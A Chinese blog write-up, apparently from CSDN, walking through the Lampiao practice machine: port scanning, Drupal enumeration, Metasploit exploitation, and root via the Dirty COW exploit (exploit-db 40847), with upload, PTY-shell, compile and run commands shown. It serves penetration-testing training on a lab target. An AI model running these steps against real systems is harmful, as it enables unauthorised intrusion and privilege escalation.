靶机渗透Lampiao

寻找靶机

主机ip:192.168.87.134

 扫描端口

靶机位置为:192.168.87.140

扫描端口

 

得到三个端口22,80,1898

信息搜集 

访问网站

162.168.87.140:80

一点没用 

162.168.87.140:1898

有文字框可以考虑sql注入等等

同时点击图片发现url 中有个node可以利用

翻阅node发现m4a文件

 访问(用win浏览器)

内容是user:tiago

 和一张图片

没用

试试sql,使用sqlmap扫描

没有收获

用dirb扫一下

找到了更多网页

访问robot.txt

发现了更多文件,逐个查阅

发现drupal版本

用awvs扫一下

发现大量drupal的漏洞

使用msf

启动msf

msfconsole

搜索相关漏洞

search XXX(写系统名)

 

得到七个可用漏洞

 使用第一个漏洞

use X(漏洞数字)

查看使用漏洞时需要的变量

show options

需要一个rhostrpost ,设置一下

set XX(变量) XX(内容)

 

运行漏洞(多查几遍options以保证可以运行) 

run

 进入系统,可以运行基本指令如ls

查看权限

提权 

我们下现在可以上传漏洞文件,所以寻找相关文件,上网搜搜得

linux低版本有一个很著名的漏洞叫做脏牛漏洞(Dirty Cow)。

脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。

漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)

这个藏牛漏洞在msf没有现成的exp,所以需要去exploitdb上找。
                        
原文链接:https://blog.csdn.net/m0_56375711/article/details/128434954
searchsploit dirty

并在文章中得知40847号文件对靶机比较亲和,记录相关文件路径

 并上传到/tmp路径下

upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp

 查看文件上传情况

 打开shell(重要)

使用python调出交互模式

python -c "import pty; pty.spawn('/bin/bash')"

编译上传的文件

g++ -Wall -pedantic -o2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

代码解释

g++ 是 GNU 编译器的 C++ 前端,用于编译 C++ 代码;
-Wall 表示显示所有警告信息;
-pedantic 表示显示符合标准的警告信息;
-O2 表示进行较高级别的优化;
-std=c++11 表示使用 C++11 标准进行编译;
-pthread 表示链接 POSIX 线程库;
-o dcow 表示输出可执行文件名为 dcow;
40847.cpp 是要编译的源文件;
-lutil 表示链接 libutil 库。

运行

./dcow -s

成功提权,试试更改密码

成功,登录试试

成功 

  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值